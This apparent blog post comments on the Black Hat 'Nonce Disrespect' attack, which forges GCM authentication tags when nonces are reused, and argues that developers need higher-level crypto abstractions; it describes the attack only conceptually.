This year’s Black Hat Briefings included many outstanding talks; being a bit of a crypto geek, the one that particularly piqued my interest was the practical forgery attack on the Galois/Counter Mode (GCM) mode of operation: Nonce Disrespect (slides [pdf], paper [pdf], example code)
GCM is an authenticated encryption mode where authentication and ciphering are done in one pass across a message. This is one of the stronger means of combining encryption and message authentication (Authenticated Encryption is better than Encrypt-Then-Authenticate, which is better than Authenticate-Then-Encrypt).
The Nonce Disrespect attack exploits reuse of random Nonce values for a given key. Repeating Nonce values for the same symmetric key results in collisions which enable attacks against the GCM message authentication function. Although not a cryptanalytic attack per se, it’s interesting to see yet another attack against the software implementation of TLS.
Unfortunately, the standards are not clear on how to ensure just how random these Nonce values are and how to ensure they are not re-used. Having dealt with various relevant standards (NIST, IETF, etc.) in a former life, I can understand this frustration. It really does feel like you have to be a bit of a cryptographer yourself if you’re writing code using a crypto API—and even more so if you’re writing a crypto library. Even if you’re pretty good at crypto, you’re still likely to get at least something wrong along the way—this Nonce Disrespect attack clearly demonstrates how even some of the stronger systems for cryptographically protecting your data can have implementation vulnerabilities.
Given that implementation of low-level functions is so difficult to get right, most people should be using higher levels of abstraction when dealing with crypto in software. I would really love to see some good consensus in industry and more work towards “a secure network connection”, “a secure storage container”, etc. instead of asking developers to work with lower-level concepts like “ciphered message”, “digital signature”, and “TLS 1.2 connection”.